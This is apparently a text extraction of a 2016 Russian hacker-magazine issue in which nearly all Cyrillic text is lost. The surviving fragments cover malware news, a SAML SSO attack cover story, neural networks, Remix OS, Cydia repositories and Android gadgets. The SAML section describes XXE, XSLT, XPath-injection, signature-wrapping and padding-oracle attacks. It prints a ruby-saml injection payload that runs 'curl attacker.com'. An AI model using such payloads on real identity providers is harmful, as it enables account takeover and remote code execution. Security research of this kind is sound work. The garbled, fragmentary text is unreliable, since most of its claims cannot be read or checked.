Вы находитесь на странице: 1из 37

2016

205

SINGLE
SIGN-ON

-
SAML SSO

Cydia

Nmap
NSE

Android

Cover
Story

2016

205

MEGANEWS


Single Sign-On SAML



Remix OS Android


WWW2
-
NETFLIX
:
][
,
, !

IOS
Cydia-

Android
BLACKBERRY PRIV


#16.
EASY HACK





THERE IS NO 100% GUARANTEE

NMAP
NSE-
X-TOOLS

POWER OF COMMUNITY 2015:


?
GIT HOOK
-
ANDROID

MATERIAL DESIGN ANDROID
. , !
,
Java-!
BSD
1. Berkeley Software Distribution
IM
Tox Linux

Windows Server 2016

Docker
FAQ


Mifrill
nefedova.maria@gameland.ru


, . Linux.Encoder, Linux
( , ). 600 , :
Linux.Encoder, .
, , , , -, . AES-
, , Bitdefender . , Linux.Encoder.
Trend Micro : RANSOM_CRYPTEAR.B .
RANSOM_CRYPTEAR.B Hidden Tear , .
, Hidden Tear, , .
, -, : , . , ,
, .
Hidden Tear ,
GitHub.
, EDA2, Magic.
. EDA2 , .
, : , ( ) .
Magic
GitHub, 15
. , .
: Bleeping
Computer TeslaCrypt
( , ), .
TeslaCrypt :
,
.
, Bleeping Computer, Python GitHub.
Windows TeslaDecoder, TeslaCrypt .
TeslaCrypt 3.0, ,
- .
LeChiffre. Malwarebytes,
LeChiffre , :
,
Remote Desktop.
, :
Emsisoft ,
.
, Bleeping Computer.

(ESET, iSight,
Trend Micro )
.
2015
( - , )
.
, : ,
BlackEnergy. Sandworm,
SCADA- .
ESET
KillDisk (Win32/KillDisk),
2015 ( 2014 BlackEnergy Windows-
dstr, ). KillDisk 4000 .
: , Windows,
35 (, , )
.
BlackEnergy, ESET SSH- (Win32/SSHBearDoor.A trojan),
.
: , BlackEnergy,
SSH , . Sandworm.
BlackEnergy ,
.
, , ,
CERT UA. ,
.
ESET :

Excel . , , BlackEnergy, Gcat.
Gcat , Python.
.
ESET , , . ,
, .
29 . , SCADA-
BlackEnergy
, 2014 .
. ,
, DDoS-.
2014 -. 2015
Excel , Microsoft
Word:
20 2016 . FONTCACHE.DAT
BlackEnergy v2, 5.149.254.114 80- ,
. ESET,
.
, .
,

, ; 64- , .
, BlackEnergy
,
.
, .
,
. The
Jerusalem Post, , 25 ,
,
.

,
Shodan, . ,
Shodan . ,
Shodan
,
.
, Shodan
.

Shodan


WI-FI

IoT-,
. Wi-Fi- Ring
. Pen Test Partners
:
.
: ,
Ring , .
SSID .
, : Wi-Fi .
Pen Test Partners ,
. , .

334

5200



Cryptolocker

26- .
2013
, .
.
. 2013-
,
-, ( ),
. 199
7 10 ,
43 .
11 ,
135 .

,
? F-Secure ,
.
,
Cryptolocker, :
Bitcoin. ,
2,2
, 5200 . ,
, . . -,
, .
,
. .

WINDOWS 10

Microsoft Windows 10: Windows 7 8.1


. , , Microsoft Windows 7 8.1.
,
Kaby Lake Intel, 8996
Qualcomm Bristol Ridge AMD. Intel Skylake : Skylake Windows
7 8.1, 17 2017 .

123456
, . , , - password 123456.
SplashData ,
2015 , ,



-10


1
2
3
4
5
6
7
8
9
10


2014 .

123456
password
12345678 1
qwerty 1
12345 2
123456789
football 3
1234 1
1234567 2
baseball 2

123456:

, 2011 .

1234567890 qwertyuiop:


,
.

Baseball football:

- ,
.

Solo Starwars:

2015
,
.

Kaspersky Free :
-, , .
,
. .
, , , , . ,
: ,
Free,
-
, . ,
Kaspersky Free, , -, , .

Mifrill
nefedova.maria@gameland.ru


Rutracker.org, . - 22 ,
, 25 , .
.
,
-
. ,
RuTracker.
-: ,
, .
.
, :
, , .
, . CHA-
. abuse- .
, -
.

, : , - . , ,
, . , ,
.
78 , .com. ,
.
, , -
, . ,
.

-
. , -
, : . .
, VPN,
-, .

crashsafari.com ( ) , iOS. ,
Safari:
Android. .
, , , .
, , :
.

. ,

- . , . , ,
, .
, , : .
,



MIT

: 40 000
. , , , Scratch.
scratch.mit.edu :
-, ,
, .
12 .
, ,
.
Scratch ,
, , , . , MIT ,
: ,
Scratch .



Cloudmark Vanson Bourne , 300 , 200 100 . , ,

1 600 000
1 470 000

.

84%

 - ,

.

32%



- .

90%


email. 48% . 40%
.

25%

,



.

44%

 IT-
. 43%

. 27%
.

56%

,
,
.

15


2016
.
, 27
1215
, , 94%
. , , : rutracker.org, bobfilm.net,
film.net, kinokubik.com, kinozal.tv, kinobolt.ru,
rutor.org, seedoff.net, torrentor.net, tushkan.
net, serial-online.net, wood-film.ru, kinovo.tv,
bigcinema.tv.

654


Apple
2015
, 2015
Adobe Flash Player.
CVE Details,
Apple,
654
. : 384 OS X 375 iOS. Microsoft
571 , 83 .
: Cisco 488 , Oracle 479 ,
Adobe 460 , Google 323 , IBM
312 , Mozilla 188 , Canonical
153 Novell 143 .


THE FAPPENING

2014 , The
Fappening Celebgate:
, ,
. , , .
,
.
( )
iCloud- , Apple. , Apple, . ,
.

COVERSTORY

SINGLE SIGN-ON
SAML

,
-
0ang3el@gmail.com

- SAML SSO.
Single Sign-On , -
(). SAML XML-
SSO. , SAML SSO, . ,
SAML IdP. ,
, . XXE,
, XPath-,
, XSW, assertions
. !
SAML SSO ?
Single Sign-On (SSO) ,
- -.
SSO :

. ,
( , , ).
, SSO-.
.
, .
:
,
.
SSO-,
. , SSO-: , ,
SSO- .
SSO- . - , .
, SSO,
.
Security Assertion Markup Language (SAML) ,
, ( ) .

(assertions), ( ).
SAML 2.0.
SAML (-) (assertions) XML.
, SAML w3c, XML:
Extensive Markup Language , XML;
XML Schema , XML-;
XML Signature c,
XML;
XML Encryption c, XML.
SAML :
Web SSO;
Attribute based authorization;
Identity Federation;
WS-Security.
Web SSO ( SAML SSO ) SAML, . .
SAML SSO :
(SAML identity Provider SAML IdP);
- (SAML Service Provider SAML SP);
(User Agent).
User Agent SAML IdP,
-. -
. SAML SSO
. 1.
. 1.
SAML SSO

IdP -,
OneLogin, Ping Identity, Okta . IdP,
Shibboleth OpenAM. ,
.
flow SAML SSO: SP-initiated flow IdPinitiated flow. , User Agent . SP-initiated
flow, . 2.
User Agent . , IdP Login URL. URL
SAML.
SAMLRequest (query string).
IdP Login URL c SAMLRequest. IdP ( Assertion Consumer URL ACS URL) SAML Response
, Response.
Response (assertions), (, , ). ACS URL SAML .
ACS URL SAML Response . Response assertion (, , assertion).
, SAML.
assertion , /app/profile
cookie .
. 2. SAML
SP-initiated flow

SAML SSO
, SAML SSO
. ,
SAML IdP (). OneLogin, ,
. OneLogin , . .
. APPS f Company
Apps, Add Apps.
SAML Test Connector, . 3. SAML Test
Connector (IdP w/attr).

. 3.

Save.
SAML IdP (. 4).
Issuer, ACS URL, Logout URL. , IdP.

. 4. SAML IdP

, , , . 5. ,
!

. 5.

SSO. X.509 certificate, Issuer URL,


SAML Endpoint SLO Endpoint (. 6).

. 6. SSO

IdP. Users f All


Users, . 7. New User.

. 7. IdP

, email . Applications (. 8).

. 8.

email,
IdP email.
SAML SSO .
,
IdP SAML 2.0 endpoint (.
OneLogin). IdP
ACS URL. SAML Response Base64 Response (. 9).

. 9. SAML Response

Response. (. 10):

. 10. URL decoding

, , XML Response,
IdP (. 11).

. 11. Base64 decoding

SAML Response IdP, Base64 Decode + Inflate Base64 Decode.


, SAML SSO .
!
SAML SSO

SAML SSO. ,
.
, , :
CODE/DECODE SAML;
SIGN SAML-, ;
VALIDATE SAML-;
ENCRYPT/DECRYPT
SAML-, ;
EXAMPLES SAML-.
-, , ,
Burp Suite. ,
SAML. Burp Suite.
SAML Editor, Python. , Jython standalone Burp
Extender Jython. ,
SAML, SAML-
(. 12). , ,
.
. 12.
SAML Editor

SAML Raider. Java, ,


Maven, jar-.
SAML Raider, : , assertions / SAML,
.
, SAML Raider,
XML Signature Wrapping (XSW).
XSW- (. . 13).

. 13. SAML Raider tab

SAML Raider Certificates, , assertions SAML-.


,
IdP . , SAML Raider,
Send Certificate to SAML Raider Certs, SAML Raider
Certificates Clone, IdP (. 14).

. 14. SAML Raider Certificates tab

, SAML SSO .

COVERSTORY

SINGLE SIGN-ON SAML

SAML SSO
SAML
SSO . .
XXE
SAML- XML. ,
,
XML. XML External Entities (XXE), Server-Side
Request Forgery (SSRF) XML Entity Expansion (XEE,
Billion Laughs attack).
, XML.
,
.
. , SAML-
, XML.
SAML SSO Response :

attacker.com , . , . HTTP/
HTTPS-.
attacker.com GET-, ,
.

XML () XML- .
<ds:Signature> <ds:Transforms>, <ds:Transform>. <ds:Transform>
.
:
Enveloped signature XML-, <ds:Signature>
, . enveloped signature ,
<ds:Signature>. <ds:Signature>;
C14N , XML- () (canonicalization) XML 1.0;
C14N11 XML 1.1;
XPath XPath-, ,
;
XSLT XML- .
SAML IdP . .

enveloped signature, 14N 14N11 , XPath XSLT .


.
, , XSLT-, , , , : (RCE), SSRF, , DoS, .
XSLT-.
XSLT. XSLT-
OWASP Switzerland 2015.
XML-,
. Response
<ds:Transform>, <xsl:stylesheet>.
. , XSLT , XSLT-:

attacker.com GET-, , XSLT.


, XSLT-
HTTP/HTTPS. XSLT-:

, XSLT
DoS-.
XSLT, XPath-, DoS-. ,
XPath-.

, XPath.
XPath-
XPath-. ,
SAML Response. , , <ds:Signature> <ds:Reference> URI.
URI XPath-, //*[@ID='aaa'],
<saml:Assertion>, .
XPath aaa .
URI
XPath- ,
XPath-.
XPath- 2015 ruby-saml. xml_security.rb, :

Ruby RCE.
XPath Ruby, shell . ruby-saml, URI :
#x'] or eval('`curl attacker.com`') or /[@ID='v

attacker.com GET-, .
SAML
IdP SAML Response
Base64. ,
.
Python, SAML Response
(Deflate + Base64) :

SAML-, , ,
DoS-.
. SAML Response.
<saml:Issuer>
Base64.

1000:1. , SAML Response
10 , 10 . , ,
-, , , - ~10 .
XML 10 .

SAML Response ,
, .
fail open .
, assertions, Response. .
, IdP
<ds:Signature> Response .

, .
IdP <ds:Signature>,
- ( Fingerprint).
. , IdP.
SAML , .

IdP . IdP
.
Response
assertions .
assertions .
Reply-. , assertion
( IdP), NotOnOrAfter,
Response .
, IdP . , MITM-
SAML Response,
. , ID SAML Response (, SAML assertion ) ,
.
XML Signature wrapping (XSW) .
.
, , SAML Raider.
XSW
XSW , ,
, . SAML ,
, .
, IdP assertion
. Response,
assertion . SAML Response . 15.
XPath
<saml:Assertion>, ID abc.
. 15. SAML Response

SAML Response. <samlp:Extensions>,


<saml:Assertion> . SAML <samlp:Extensions> .
<saml:Assertion ID = "abc"> <saml:Assertion
ID = "evil">. <saml:Assertion ID = "evil">
<saml:Assertion ID = "abc">.
SAML Response , . 16.
<saml:Assertion
ID = "abc">, <samlp:Extensions>.
.
<saml:Assertion ID = "evil">. XSW-.
. 16. SAML
Response

assertions
SAML assertions, assertion . SAML , assertion . SAML Response assertion . Response
<saml:Assertion> <saml:EncryptedAssertion>, Base64 assertion,
, <xenc:CipherData>.
RSAES-PKCS1-v1_5. (AES) CBC.
assertion
(Oracle), , padding XML.
. assertion
padding , . , assertion,
.
XML-:
. , .
,
.
(Juraj Somorovsky) ,
XML-. ,
: .
( AES 16
) 162 .
2015 Black Hat EU WS-Attacker,
XML-. .
.
assertion , . 17.
, AES-CBC ( 16
). i- Pi :
Pi = Ci-1"D(k,Ci) = Ci-1"x. Ci-1 i-1 , Ci
i . AES D(k,Ci), x.
. 17.

assertion

, XML-.
, XML <ABC/>. XML UTF-8.
XML (6 ) 0x3c 0x41 0x42
0x43 0x2f 0x3e. AES 16 .
10 0x3c 0x41 0x42 0x43 0x2f 0x3e
0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x0A (0x?? ). ( 0x0A ).
, Ci ( ).
0 i: C0, ..., Ci. Ci-1
SAML Response .
Ci-1, XML
( 0x01).
Ci-1 C~i-1.
. 18.

C(i-1)

C~i-1, Pi ( Pi[16])
( ). x[16] (
x[16] = 0x01C~i-1[16]. Pi[16] = 0x01C~i-1[16]Ci-1[16].
( 1- 15-). , Pi[3].
( XOR) C~i-1[3] ( )
XML . ,
, Pi[3].

, , SAML SSO. , SSO SAML , SAML SSO.


, , SAML SSO, ,
. !

PC ZONE


paramonov@sheep.ru

, . , , ,
, .
,
IBM.

, ,
. , .
. ,
, . . ,
.
, ,
, .
Caenorhabditis elegans ,
, . !
250 , , , .


,
, . , , - . .

Mark I Perceptron.
,
. Mark I : 400 , .
, , , . , , , . 512
, .

, . , , .
. , .
.
, ,
. ,
. .

, .
.
. .
,
, .
.
. . .
.

. ,
.
. , (
) , , ,
. .
,
.

,
. Python Numpy ( Numpy, Numpy
). .
.

Hello World MNIST, 60 ,


, , . - : . .

, :
, . (, , )
. syn1 syn2: ,
.
. , Numpy: , numpy.random.
random, , .

, .
, 60 , .
l0 , . . l1 . ,
(l0)
(syn0), . l2 .
, l1 l0 syn1 syn0.
: , .

, l2, . ,
, . ,
, ,
.
(l2) (y), . l2_delta
. , , .

(l1). .
(syn1), .

, , , : .

. ,
,
. (backpropagation).
,
, copy-paste,
. -, ,
,
.
Python,
, . Pybrain, .

. , , : ,
, .

, ,
. ,

.
, .
,
.
, ,
. . ,
.
,
, , . ,
.
. (, ) . ,
, .
. , , , .
, , , ,
,
.
(pooling),
. -,
, ,
(max pooling). , , ,
. , , .

, .
Pybrain,
, ,
classify_image.py, TensorFlow,
Google. ,
ImageNet.
.
$ python classify_image.py --image_file cow.jpg

,
. classify_image.py , . , ,
, .

, ,
, .
( 64%), (5%) (4%). , ,
, .

, , , . Google -
- Google Cloud Vision API, , , .
AlchemyAPI, IBM,
. ,
alchemyapi.com . REST: URL gateway-a.watsonplatform.net, HTTP-,
XML JSON.
. AlchemyAPI : URLGetRankedImageKeywords
ImageGetRankedImageKeywords. , POST. .

>>> pprint.pprint(call_api('http://gateway-a.watsonplatform.net/

calls/url/URLGetRankedImageKeywords',

url='http://goo.gl/I9ytWA', apikey=apikey, outputMode='json'))
{u'imageKeywords': [{u'score': u'0.985226', u'text': u'animal'},
{u'score': u'0.964429', u'text': u'cow'},
{u'score': u'0.598688', u'text': u'cattle'},
{u'score': u'0.5',
u'text': u'farm'}],
u'status': u'OK',}

AlchemyAPI ( ). IBM :
, . , : URLGetRankedImageFaceTags ImageGetRankedImageFaceTags.
.
>>> pprint.pprint(call_api('http://gateway-a.watsonplatform.net/

calls/url/URLGetRankedImageFaceTags',

url='http://goo.gl/Jh34qd', apikey=apikey, outputMode='json'))

JSON . IBM
, ,
: , , ,
, .
!
AlchemyAPI .
, : 0,75 . , . , , .

PC ZONE

REMIX OS
ANDROID

Remix OS Android ,
. ,
, . ?


paramonov@sheep.ru

, Remix OS .
Jide Technology, Google. , , . Jide Technology Apple, Google. , ,
Apple, . , Remix OS
, .
Jide Technology 2015 .
Kickstarter Remix Mini , 70 . ,
Remix Mini , . x86 ARM, Remix Mini Android.

, Remix Mini -. Jide Technology


Ultratablet -, , iPad Pro
Microsoft Surface.

Remix OS ? , Jide
Technology
. , Android, . Remix OS
Remix Mini
Ultratablet. , .

Remix OS
Android-x86,
Android, . Remix OS Android-x86 , Remix OS .
, , .
, Remix
OS Windows . USB-. ,
, (
, EFI ). . , USB 3.0. .
. Windows
. . . ,
Remix OS.

. Live CD.
,
.
. , .
,
Remix OS . , , . VirtualBox .
. Remix OS ,
, , .

Remix OS ,
, .
Windows 10. , OS X.


, Command.
, , . ,
. Win
.
: , , . Android Remix
OS . ,
.
, .
,
. , . ,
. , .
Windows.
, : , , Bluetooth
Wi-Fi, . .
, Windows, . OS X. ,
. Remix OS ,
. .
, , , .
Windows:
,
. , ,
, . Windows

. Remix
OS , , .
, . , .

, , ,
, Windows.

, Remix OS . , ,

. ,
. ,
.
, .
.
, Android , . Remix
OS ,
. , , . , .
.
Remix OS
. ,
, , , , . ,
. - , .
. , Remix OS 140 , .

.
,
, . Remix OS , ,
.

. , .

, Remix OS, .
Android,
MX Player. ,
, ,
, , Dashboard.
. .
Remix OS . , , ,
. Finder, :
, .

Remix OS Google, Play Store.


, , .
,
, Play Store , . -
.
, Play Store .

APK,
. , , :
, , .


, - ,

,
Remix OS.
VLC,
.

. , , Minecraft.
.
, . Remix OS
. , .

, Android .
Remix OS , , .
, , Android, : ?
Android? , Windows. , OS X.
Linux. , Remix OS , , Play
Store, , ? ?
? .

PC ZONE


. ,
, : , , .
,
.

84ckf1r3
84ckf1r3@gmail.com


,
, . : , , .
,
. . . , : , , ,
, , .

Adblock Edge


.
, ,
, .

, Google,
, . , ,
, ,
. ,
, , IP-.


ID . , , . , URI (. Chrome: Adblock).
TrackMeNot (TMN) Firefox Chrome, -
JavaScript, C++ XUL.
, . , .

TrackMeNot

.
:
( RSS ), . , TMN ,
.
TMN

burst-mode , .
Google (
, , IP- ).
burst-mode,
(, ).

TMN IP



. . AdNauseam
(. ) Firefox,
.
AdNauseam
Adblock

AdNauseam . , . Adblock,
AdNauseam . ,
.
Adblock . v. 2.6.11 Adblock Plus , Edge . :
Adblock Plus, .
AdNauseam

Adblock
Plus 2.6.11

AdNauseam .
, .

. page-worker API Mozilla Firefox.

AdNauseam


TrackMeNot AdNauseam . , . ,
.
. TrackMeNot
. RSS ,

WWW
. AdNauseam
- ,
. ,
AdNauseam drive-by- . , -


,
AdNauseam GitHub
.

. - TrackMeNot
, NYU
.

PC ZONE


apismenny@gmail.com

SEEDR

www.seedr.cc

Seedr -

, , ,
-
-. Seedr : ,
.
, - - .
, , StreamNation,
: . (
), .
-, Seedr -: , . , .
-, Seedr ,
- , , ( ,
,
; ). , .
Seedr
Chrome. ,
Add to Seedr.
Kodi ( XBMC) Seedr API
.
, .
100 10 , 250
15.
GUESSTIMATE

www.getguesstimate.com

Guesstimate

( , )
. ,
, ,
. , - , ? - Excel?
Guesstimate .
Guesstimate ,
, . ,
, , -
. , , ,
.
, , ( , [1,100]), , Excel, , .

, . Guesstimate
.
, , . ,
-: Guesstimate 5000 ,
.
Guesstimate c .
, ,
. Guesstimate
Public
Models ( Test).
.
SSL SERVER TEST SECURITYHEADERS.IO

securityheaders.io

SSL Server Test SecurityHeaders.io


, . ,

HTTP, . , ,
.
SecurityHeaders.io , .
, , . :
, Scan
, , . , X-XSSProtection ,
XSS, Strict-Transport-Security (HSTS) MITM.
SSL Server Test, Qualys SSL Labs, SSL .

.
(
F A+).
,
.

NETFLIX


apismenny@gmail.com

: , , , , .
, , .
:Netflix and chill.
,
: , , , . :
, Google , Netflix
... , , , . , ;
.
Netflix .
70 ; , , . : ( 12 34 )
30%, - .

Netflix , .
-, ,
, ? , , .
,
(- ), ,
.
. Netflix big
data, .
, , SMS
( SMS).
, ,
. , Netflix
- 800 . .
.

,
, , . :
, .
2008 . Joost, .
,
KaZaA Skype. Joost
: , ,
. , Joost , , 2012 . : Joost
, .

Joost Torrent. - .
, - , , ,
. .
.
Popcorn Time
2014 . Netflix , . , ,
, The Pirate Bay.
, Play . .

Popcorn Time, . Netflix

, . : , ( Popcorn
Time ) YIFY, ( yts.ag, , , ).
, , - . ,
?
Popcorn Time ,
?
: , .
The Pirate Bay ,
.
-

, . , ,
. Netflix
INFO
,
.
Netflix

,
, , ( )
:
, ,

. ,
IP .
, DVD
.

:
, DRM .


. , , .
,

,
TPB
.
,


-,

. , -
,
. , The Pirate Bay , :
, , .
,
. ?
: ,
?
, . ,
, .
, . , , . , ,
. ,
, :
.


5 10 ( 6 ). Lost ( ) 4 , Breaking Bad ( ) 3 .
, , - ,
.
? :

5,7 ( ). , , . , -,
, , -, ,
( , , 90 ).
, ,
. , , 100 ,
Pixar .

, , ,
-, ( - ), -, , , . , ,
, :
?
,
.
, .
, , . : , , , . ,
.

MOBILE

][


zobnin@gmail.com

,
X-Mobile , ,
Android , ,
. ,
, , ][,
. Blackphone
CyanogenMod.
INTRO
, , ][.
, . :
1.  , , (
)?
2. -5 ,
.
, , . !
, , , - . ,
, , , .

DR. ,
, MALWARE
Sony Xperia Z3 Compact.
Samsung Galaxy Nexus
, . , (4,6)
(1280 720, HD).
( , ). ,
Sony ,
, . , CyanogenMod Cyanogen
.
iPad 2 ().
, ,
.
, Pipo M1, .
, , , , .
... , , Android + Windows 10,
, , ,
- .
- ( ;). , GPS,
, , . -
.
Xiaomi Mi Band,
, .
(
, , ), . .
, 7:00 ,
6:45 , , ... , .

, FBReader
( , ), Dr.Web (),
World Newspapers ( ), , , .

,

: ,
. ,
, , .
,
. Xenium Philips.
Philips Xenium X1560, ,
Philips Xenium 9@9q (, , ).
( ),
. , ( , ,
, , USB-, , ), iPad 2 . iPad 2 , ,
. .
iPad Air 2.
, iPad:
1. MAPS.ME -, .
.
2. Hotspot Shield VPN: VPN iPad. ,
SurfEasy VPN.
3. Panic Prompt 2 SSH-. VPN .
4. Textastic . ,
MD-, .
5. Dropbox ,
.

, -,
PC ZONE
. iPhone 6, iPad
, Apple Watch .
:
Inbox , ,
.
.
, - , .
Byword , , . Markdown,
iCloud, . iA Writer, .
Things ,
. GTD, . ,
Wunderlist ( - ).
Reeder , RSS iOS OS X. Inoreader
, .
Soulver :
. ,
, , , .
( ) Angstrom
.
, . Tweetbot
( )
.

, UNIXOID,
SYN/ACK, X-TOOLS
Nexus 5,
Nexus 4, . Android ,
. . Nexus 6
,
. , Nexus
5, .

Nexus 4. Samsung
Galaxy Tab P1000 Android- . , ! . ,
- ,
. /// .
, :
Asana - ][;
Evernote , ,
;
Feedly RSS, Google;
Google Sky Map , , , , , .

,
X-MOBILE
, ,
OnePlus One. , Nexus
5X, 250 , ,
CyanogenMod (,
Cyanogen
OS) . (
) - .
, - Qi- , Nexus 4,
:(.
,
Motorola Defy
MIUI.
,
. ,
. iPhone
iOS , , .
, , , , Omate TrueSmart.
. Android- c SIM-, GPS - .
, , / :).
, -5 :
1. Action Launcher
: Cover :
, ,
.
2. Pocket -. Chrome/
Firefox ,
, Pocket ,
. 90% .
3. FeedMe RSS- Feedly.
.
4. MultiBoot Manager . Must have .
5. Dropsync Dropbox-
( Dropbox),
.

,
][
iPhone 6 iPad mini 2.
Android- Nexus 5 Nexus 7.
iPhone iPad. Android , , Android iOS,

, . Apple.
Android- , .
iOS :
1. . , iOS ,
,
Android. , App Store,
.
VPN
iOS .
2. . iOS- , Android-. Google, Apple . App Store
, ( ).
3. . iOS , Android .
, . , Android Tasker,
- , .
, .
, .
. -, .
OS/.
, :).
:
1. OpenVPN. VPN-, OpenVPN Access
Server AWS. , .ovpn. Must have road warriora.
2. 1Password. . 1Password. , , , , , .
3. Parallels Access. . : , ,
, , Gaming Mode! , ,
.
4. Slack, Asana. , -. ,
. ,
Asana. , , , . ,
, .
5. vSSH. SSH-. , iTunes, , passphrase, . :

F112, Tab, . , , .


, , *nix
, iPad 2
. ,
, iPad.
, X-mobile , , .
, ,
. . , , ,
. , , Palm
, ,
.
.

MOBILE

BRADA

john.brada.doe@gmail.com

Google , .
/, Google Play Services ,
.
,
Now on Tap, , , Tasker.
, .

Nexus. , Google
Now, . Google Now,
Google , Google.

Google Android-.

(
). Google ,
( Ok, Google).
Android 4.4 , ,

( ).
, , . , MOTO X
,
,
.


, , Google Now.
, , , . , : , Google,
?, .
?, . Google
Now , .
/ #_ #_
. Google Maps .
, , .
. . ,
, , , .
, .
/ , . WhatsApp, Viber
.
# # #. : WhatsApp . .
. , . / ( -),
.

. Google-.
, .
, ( ) .
.
.
.
/ () # #.
Play Music YouTube.
, ,
, .
/ / . .
, .

. Google Keep.
NOW ON TAP

Android 6.0 Marshmallow. . - .
Now.
? Now, Google
, , . ,
, ,
,
. Google . , ,
, . , Facebook Twitter- ,
. .
, , YouTube .

Now on Tap

GOOGLE
, . , . ,
.
Do a barrel roll.
Make me a sandwich!
Sudo make me a sandwich!
When am I?
Beam me up, Scotty!
Up up down down left right left right.
What does the fox say?

TASKER
, , , Google Now
.
Tasker AutoVoice.
: , , , ,
, , media,
HTTP Get Post , . , . .
Google Now Integration
AutoVoice. . ,
. . Event f Plugin f AutoVoice Recognized. :
Command Filter ,
: . Speak Filter,
.
Exact Command ,
,
.
Use Regex .
. (|) (|) ,
, ,
.
Audio f Ringer Volume Audio f Notification Volume.
Alert f Flash Text .
Google Now,
.
. App f Go Home. , Alert f Say , .
.

, AutoRemote,
Android. EventGhost, .
,
. (Joao Dias), Auto*-,
,
Cortana .

. ,
, , . , , , ,
. .
Open Mic+ for Google Now
Ok, Google
. ,

Google Google
Engine, PocketSphinx.

,
,
.

.
( )
. MOTO X, , , ,
,
Android . Bluetooth-,
,
.
Commandr for
Google Now
Open Mic+. Google
Now . : /
, /
, / , /gmail ( ), <>, , ,
.
, , .
/ ,
, . .
, Task. Xposed, Commandr
Android Wear.

Open Mic+ for Google Now

Commandr for Google Now


,
, . Tasker, ( ),
( , )
. - , . .
Commandr, Google Now,
, , ,
. , , ,
. 25 , .

, ,
, , ,

. , , .

MOBILE

IOS
CYDIA-


mfilonen2@gmail.com

, iOS- ,
Cydia.
: - , -
, -
, .
, .

, ,
. , -,
iOS.
MyRepoSpace. , . ,
, It was fun
. YouRepo.

YouRepo

YouRepo

, , .
. :
, , .
, . , .
YouRepo ?
, , CMS
. ,
,
. , , . , ,
, , .

IOS
iOS-. iRepo, 2 ( ,
). , .
,
/private/var/mobile/iRepo. ,
.

iRepo

iRepo

iRepo . -, ,
iOS. -, , .
.


, ( , ) Ubuntu Debian ( Cydia . .
.). Linux ,
.
.
: Release Packages. , , . ,
Packages,
. ,
(
). , Packages Release.
Release , , .
. :
Origin: ;
Label: . Cydia;
Version: ;
Architectures: iphoneos-arm;
Components: main;
Description: .
, , . ,
. :
UTF-8, Cydia . .
Packages, Release, . : , , , . Packages
, :
Name: , ;
Size: . ;
Maintainer: ;
Section: , . Tweaks, Themes, Games, . .
, ;
Author: ;
Version: ;
HomePage: ;
Architecture: iphoneos-arm;
Package: , ,
;
Filename: , (/ ,
/dir );
Description: ;
MD5Sum: MD5,
. .
,
.
: Depends ( ), Pre-Depends ( ), Conflicts ( ).
. ,
UTF-8.

Release

Packages


Section

MD5 . Mac,
Windows. , OS X MD5
, . , md5,
. , MD5 Mac
-r.
Windows WinMD5Free . .
Packages Release
Packages. Windows gz- 7-Zip.
Mac : gzip -f -k
Packages.
, : Packages,
Packages.gz, Release deb- , Packages.
,
, FTP
.
. INFO
MySQL PHP
- Apache. Mac Apache (2.4.16
)
, Depiction
OS X.
/DEBIAN/control sudo apachectl start
deb-. .
,
localhost
Packages,
It works!. ,
localhost/ .
, /Library/
Maintainer Author
WebServer/Documents.
Packages-
Apache Windows .
<>,
.
.

Packages.
.msi apache.org.
Cydia
( localhost).
,
Program Files.
.
conf httpd.conf,
,

( ServerName)
Cydia.
,
( DocumentRoot).
htdocs
MD5Sum
,
,
, .
,
Apache .
,
, .
.

,
, . . -,
Packages Packages.gz
, .
-, Packages.gz
Packages.
. ,
gzip -f -k ,
deb-. , , Cydia.
,
Packages .
,
Cydia .

INFO
Linux dpkg
scanpackages -m,
Packages
, deb- .
Fink Mac,
XCode Command Line
Tools Java.


Packages, ,

.



,
. 59 59 72 72
PNG CydiaIcon. . Cydia ,
.

, . , .
, HTML-,
Depiction.
Depiction Packages
Depiction: HTML- .
Depiction Description .
, , Cydia
, , .
300 .
Depiction Cydia ,
-. PHP, HTML, CSS, JavaScript, -
.
, .
,
. . , , , ,
BigBoss ModMyi.

Packages, , , , Packages.
, .
, OS X,
. GitHub . MD5,
cURL, . , AppleScript Editor.
,
default answer. / , .
,
, .
WWW
.
YouRepo

? , , .
, , .

MD5
WinMD5Free
BigBoss
ModMyi

MOBILE


rommanio@yandex.ru


ANDROID

Google
.
Android ,
,
,
, , .
: , , .

IoT . 2005
( ) ;
.
, , UPnP.
Android, ,
.
, Samsung
Android. Samsung
Android, ,
Nikon.
. Google
, .
.

,
( ) , -, . , , ,
, Nikon, 2012- - Android 2.3. , , Samsung.

Samsung Galaxy Camera

Nikon Coolpix S800c

, Samsung
,
. , Exynos 4412, , ARM Cortex A9, Android,
Expeed C2.
. Samsung Galaxy Camera Android 4.1 TouchWiz, ,
.
GSM-, (
Skype). Android. ,
, .
Nikon Android 2.3. , ,
Android,
: Samsung Android,
, Nikon ,
. Android , GSM-
, Wi-Fi GPS. ( ) , .
B , , Samsung
Android , .

, ,
, .

Android Android TV.


, - . Android
5 , Google Play,
, Netflix Kodi ( XBMC),
.
,
: activity action.Main LEANBACK_LAUNCHER, , Android TV,
, D-pad. ,

.
Sony 55W807C :
16 ;
72 ;
JPG 92 .

Sony

Android TV ,
. ,
, .

! Android . . ( Touch
Revolution) CES 2010. Android , , 2013 CES
Dacor.
Android
SectorQube. MAID,
Make All Incredible Dishes, Microwave Android Integrated Device.
MAID , ,
, (,
) , Wi-Fi.
. , (, , ).
, . ,
, , .
( ) , Kickstarter, . 125145 .

MAID,


Dacor

Dacor. -. Samsung SSPV210 1 , Cortex


A8. 512 DDR2, - 16 .
SD-. , Wi-Fi Bluetooth. Android
4.0.3. : 4500 7500 .


Android Samsung. ,
2012 , 10,1- , ,
Epicurious
Evernote ( ) , .
,
(, , Android ). , CES
2016, 21 1080.
,
(
), , ,
,
, , ,
. ,
!
- ,
.

-, ,

, , ...
Seraku
2012 . , , . , , .
,
. , Android.
Android

, , , .
REMIX MINI
.
, - Google. -,
,
HDMI, . . 12,6 x 8,8 x 2,6
. 64- Cortex A53, 1,2 .
( , ) 1 2 8 16 . ( HDMI) :
2 USB 2.0;
Ethernet;
;
microSD.
, Wi-Fi, 5 .

Android, Remix OS. ( ) , , (, / ),
, ( ) , ,
Google Play.
-
Remix Mini

Kickstarter.
, . Remix
OS .

Android Wear Android


. Omate Umeox.
Omate Truesmart Kickstarter. , . :
1,54 ;
100 ;
MediaTek MT6572 (1,3 );
512 1 ;
- 4 8 ;
GSM/3G/Wi-Fi/Bluetooth;
600 ;
Android 4.2.2.
Android,
. . - . (5 ) ,
,
. , ,
, .
-.
, Google , Google Play
.
